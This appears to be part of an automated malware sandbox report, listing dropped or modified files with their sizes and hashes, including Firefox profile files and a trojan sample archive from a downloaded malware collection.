SHA5120e25719d9a265f43498620a09318e0cf311317abc7a6d196cc4dde302a0f0fa3110e7c764a68b35e88373f7650a0de04b8fb802b923fb5c31ce9dbdb78028417
-
Filesize
3KB
MD5eb8c465e8e28c1babff2e2ec56e73afc
SHA10c51851c23ac6fb9b20037d54b7749260a743446
SHA256286c06f50dc863e773c9adcbddac217f937280d042c2e5bb08106791242bc15e
SHA512d575d68613d6f3f9767230fef7458f2ecc7ba3c8bc8a70579b5bc43a5e4157b4c36e017296f4d6c476a99d9f2097398050971ae9ec79aa1258f3562615d80506
-
Filesize
2KB
MD584993ed13e4ecf461fe7267935f14d43
SHA13c85dd21ec428359a7ba1cc8667279645c3ea933
SHA25670e1184a32770aa6dac0a04f78a4eb7d22b751cc69549622f8af8583f388c8b2
SHA5123a568139a6aab237373dabd4cff8bd28e688730a40c1a00240cbf1f95a3fdbb4cdf38510341426e51ba719d062d4afff8552b9bb4b2d6f98a71e056f6b5edb6a
-
Filesize
1KB
MD51cf5a0ebcd65e95827ea2ce3015e3ab8
SHA16b15b4509ebfbed3818fd6ee76f185892b243e2a
SHA2569f980a8d0cbf825a9cdbde1c34d705938548249262aa60a50cef1b6c3ea3bd6f
SHA5129d42286bc24b20691c39f8c86baeadc5a74efd6d23e2e19ff17189e965b4b16bb8f57fe398207c545d6602011d247ff6b0a8e8aab36a9624b0af71e1a5c0709f
-
Filesize
536B
MD59b700d6cbc0e2d7d66d723150a975c37
SHA11ec3e1b14a86f85af882ec3db9def5be80e69786
SHA256db077b11a93890dc3764ffb6287b5cb79f15e8c172ba86e3c8a2a3ff65a6d218
SHA51296223a81ca23287d094cdf58da3e6cd57a11a182ee9cc3ffce4d1f5229dc7de625b0014d769418326a6ad4f3f51d121751c3b5c7ccc36b5bbfadb15d281eecd2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
12KB
MD5202f9128056e73faae2e648abb45538c
SHA123a41db90fb215663a700a179d46fafa58597239
SHA25672d1304724ab6c8003147dd212da04e88105dac6661ebffeca9b70471eb741e4
SHA512c302010365c2472d594809e0cc989c19f1e0ab01ec90d1d86836df305fb3e50f8aaa7bba17c56a8d21764a60e9be6b96d4e309cb1f9b72fa39e12c85f2aad8e4
-
Filesize
12KB
MD52433d9f02d2b190d2a6cc8dd10e053b3
SHA1b8ae44a602f4754a8b759b7dcbc578b1b0d975e4
SHA256162672d1342a7b3347410730aa30a31374f46e99e6c6db80b7aa783801846d06
SHA5124e8c716b20a6e5ee6a86d5e707252b22c831ce0a2b5b04d492ed15d5a1d6a9c4263a71861d5808ca28218af61eeac7e5596fc92cdf45e7a732d8a0e8a455acf9
-
Filesize
12KB
MD5b8459e2d21bdafece33293ca8513fa07
SHA1a88347c8de322f44d2baa0a5f6320710ab331b47
SHA256b2e0b1c40bc03676bb38c119c1d0c3658635f4bdfff3d9da31df26fd9fd8fefd
SHA5124c393983604aba25d2f25a1028d48b6d133bc3e867f23eba64564a6ee9c4ba243809c8b274e060a5495c692e6585c20a1dcb5d5be443850451892fcce939d90a
-
Filesize
12KB
MD598532bf2e27955abb253ac88d64cb9cd
SHA1fab215bb631d46cb47564ba712b232385f29b7d8
SHA25629e4fa02114b4f8cc68998cfcd7956a7c5006adab0ca8a21356041b583d57b68
SHA512ad2c6f0fe22306a13c645a738c9c0afd7bd3ccbebea38e83c37d9bb4ba0fcf05885232a4003e4c735f22f7143b16c46394d81d209452374ca098753be61f5f24
-
Filesize
12KB
MD58b82813d69dc66583b967e642ffe2d42
SHA168149d1fc9c78eb6f2bb9c04fc06d6faba78e4fb
SHA25643e8f791a5c909907921ab9476b1c88d9948bf6b2c51c3de83719f916312ad55
SHA51262fef985db5cf96cf5e784a4db1e3e8cd2be3639be3468bc0b3b99be92041526fcc860e8b4b48afa1ab8fd3b421ebf6a21c59d51c286b448e4b8987e06b39157
-
Filesize
12KB
MD54d438fccc4585dbb7f07259d1ef5d529
SHA1b6a2f3a24af3b0809af5e7523d52ec77ed05d5e5
SHA256ce4e842deab743a034b1f0b0738948013ba0ce62c3a6a582de7fd68de0e68204
SHA51271e4e2cab1c1b0f405856eb7b5a92e190c97d15509efb968855d5b8da9eb44e089f39436e375a1c691d8649edfad8945b3257939f9e27f37d6634801a34b0ff5
-
Filesize
12KB
MD56c0ddea7eb1c946ded6e48dc97da8a1f
SHA109e2a630d29b0f8e75e9c2128aa0e6e3bc47acaf
SHA256f9c64123216223ac1ce5bb7b621b5d4d4c71748ccaef3d71b5e28632da25e820
SHA512cb4844ff6ac272714818b85b4f77824495f3fd948b6ed88531b0bbf9adefb57b0b2bf801a368249589f5d50cce63e73c38fd5b55d628314c864c3750111027f4
-
Filesize
11KB
MD5cc2e806677568b4a2ac31e4d55ee6a4b
SHA19065349a0ba810d00dfe4aebd5082bb157b19528
SHA25631d40e8c0104e3acf9751354bbf594575b8a784100f9daef82515b1e372a93cb
SHA512d812b221ee0115fdd7a4f65e70524adf951d87ec160f67a91f915b90223a23b17985547e11c6c10d5feceaf737ffcfbfffe42df5f94001911730fc6c9c68941e
-
Filesize
256KB
MD529bd18035ac3468ed8ee41ba90d66f22
SHA136e76825c5aff3f599ec16a85b14ee487595a69d
SHA256eca587e1d30a5a9c65a7f3d69272ebc2890a0ec954d1ee4ad7d5ac45bd95ddc8
SHA512b1b8a231de045c227d430c9edd5996b882153fd848fc319ba2dfbfc7aa309bce8a3551889f735f6de6d6fdfc09a1ffad4dcb4fd7ff2d4017eeb2c97f7a83f7d0
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
1KB
MD525ab806bd4fe61d08cd54550665d212d
SHA1dd3dcc0635234fece2122a35a96aee5cddb4d5ed
SHA256790ce4bfb14b258aaf431b84f29b903ba56314eca4ee491afb0123e7ef7a697c
SHA51265f0be9c5a6d8a7b847006bf101d73f4d226e9728f1dcf5c3434f63c87923746cfaabc92c8daa261a5cf82c60dafd5b78e0f2abfd8c548136232bf320a340b4d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5be8ad4d63b8087b88a4d6baec0692650
SHA1685cfbcb804f5667c3301ca52ed519b2105dfd7b
SHA256b47552e57c9e6790ab1201702b6eff6864631848ff63349aebf25e33a4b7e7c2
SHA51292db9ac4ff79e82b51864338cd6e4fb156d56d838cae841ecd183b3f622116a0316ff4ce41b2eb14007db50bdbd7702b8890b9b43fcb8acf19713b7abd7c3b01
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\pending_pings\0e456dff-d706-4aec-bacd-2cc7a352b8c2
Filesize746B
MD51d2d823673fbfbb1e4411ad74392acad
SHA19ecd74936aa67ec7a7818833809d7e62b3f888d0
SHA2562076d2c5ae62a91d4c15e4d769ccb30bc4fea89a197f2faceb96a5b4afb93e30
SHA512b19b8fd434440ccc6ba530e5d6fef04483a87cc636760103756e77735fb44fc0748224d217736dc6d45b10bcd51bfe26dabe1a8f4518deb0be61e772c750cd88
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\datareporting\glean\pending_pings\231379a7-6ee5-41b5-b8bb-f4323d895bb3
Filesize11KB
MD55da1070221292c31c505311f6994ccc4
SHA1c7d8c2080a19f7da6ab7cf266d88c2fbf4612aec
SHA256c15ec38708bcebf004cab1775511ee921f9a818bfe0e346a20e4750401a1a6eb
SHA51240dc146a38fda8510b8e46000f54589d4e3e27032534afac80f3c06efee9c3cc98f32061ca9aef4f11cdd36dc0cf46cb7634d644f6200dcd3364ab35d0a70151
-
Filesize
6KB
MD5282832597c2a6861de8e3598233f7b51
SHA1ca4e3dd896e535350885baa929cc3c4c663cd6b9
SHA256566e714a4a55d52b246bdab6012158e3215d3d92fa1a724d873a32a1c3580043
SHA5124ae135ee664e9a3bf341247adf680c2a2eea6cd19d3415236601f08a6069fbaee3e8ef74cbe224605a121a0941c542a82ecbc86db81b144fbd4fd644229ef989
-
Filesize
6KB
MD583e372a97f43383d683ee6d70004db6f
SHA1dd726f58136da571234ac81561c17e84ed5d8d8f
SHA2566058a6759354b94976df1db1dd6f7773914e00e1e5f3782c71b0b004ab9f53e3
SHA512d489c7ebdc581030cf2d3719e4965a2b43dd039efae110f392542b7f39dee0e3678672b084193c1450fff65577c48089dee823e1659e6ee7acb0314ae111c8af
-
Filesize
6KB
MD52b030eb2a04d7fe112cced35b88090d2
SHA1a295fdb3e809b5b226dd5dc94d8304048832fad7
SHA25633b4f1232b53db47c8d0510bfda2e5c74277fea95730f92ce27f92e49e5425d0
SHA512d2b1a18ef9883ebb04dba930cd722f2fadf5a9e80d607e5af247bf55e8bcf0445908376b55a6134b2d36375cab4e67b5f5bc199d32b7891939b23e27295cc286
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore.jsonlz4
Filesize631B
MD53af7cb686997c9f81795d922e7b13b25
SHA16a0accec10c6a09ed72226f1f5f7f6b7b3b4a259
SHA256a5e06cb4fd6795fbfb8e01d7045a4890bf987ee05e5947126c0f0695bfa83f16
SHA512d704434bad662192ef6a30ec76fe521019cd5d516d7b613648fd735f5ae7ecabcf8bc6a0e0ddba471a204d3a9d6e88f8bb05bc647ac4bc040e91b0af2ed93270
-
Filesize
10.1MB
MD5ef04597cf104da41f58165e3f36b5f74
SHA1f2e543c86b524d9c4dbb8a8e02ab1e113dde083c
SHA25622fda03a09b555dd80a313335d7466e94c5b7785ef2f51a47388e9a559fc69ab
SHA51292501d1353710829e9ca5a1b80fdbaae7d7e16eeae9571dfcc1b6c10e9fa7e30e5551a8eca9d95acd3ef62e62525218639786e0f4b1dea3875c9f140eccab120
-
C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\trojans\FakeActivation.zip.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F
Filesize275KB
MD52123e0ae8b9b32b5d25bb1f8484be9a4
SHA10245446c7cc82e1f2f097b3e182b3eac13624426
SHA256ecf59af2ffd9ce6fd4a160c8a0c6f7b9ad5e11ab8585b74c2273f96c69b2a312
SHA512a5839ca075b866c68157cfc10e1c3613b4203eca4568466c072b2f95e2339974b7d39160e12e9d22123387a892cab3d96551e5c501cf80aeaa80d9510defbb56